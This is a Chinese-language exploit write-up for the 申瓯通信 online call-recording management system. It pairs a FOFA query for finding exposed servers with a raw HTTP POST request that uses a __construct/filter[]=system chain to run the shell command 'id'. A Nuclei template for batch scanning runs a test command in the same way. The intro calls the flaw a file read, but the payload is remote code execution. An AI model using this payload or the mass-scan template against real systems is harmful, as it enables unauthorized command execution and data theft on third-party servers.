申瓯通信设备有限公司在线录音管理系统 -RCE-index.php

漏洞简介    

        申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。

漏洞复现

fofa:"title=在线录音管理系统"

发送以下数据包进行命令执行后可在响应正文中获取命令的执行结果！

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: yourip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

 

 批量脚本

id: LYXT-index-RCE

info:
  name: 申瓯通信设备有限公司在线录音管理系统-RCE-index.php
  author: WLF
  severity: high
  metadata: 
    FOFA: title="在线录音管理系统"
    Hunter:   
variables:
  filename: "{{to_lower(rand_base(5))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-type: application/x-www-form-urlencoded
        Cache-Control: no-cache
        Pragma: no-cache
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close
        Content-Length: 62

        s=echo Hello World!&_method=__construct&method=POST&filter[]=system



    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"Hello World!")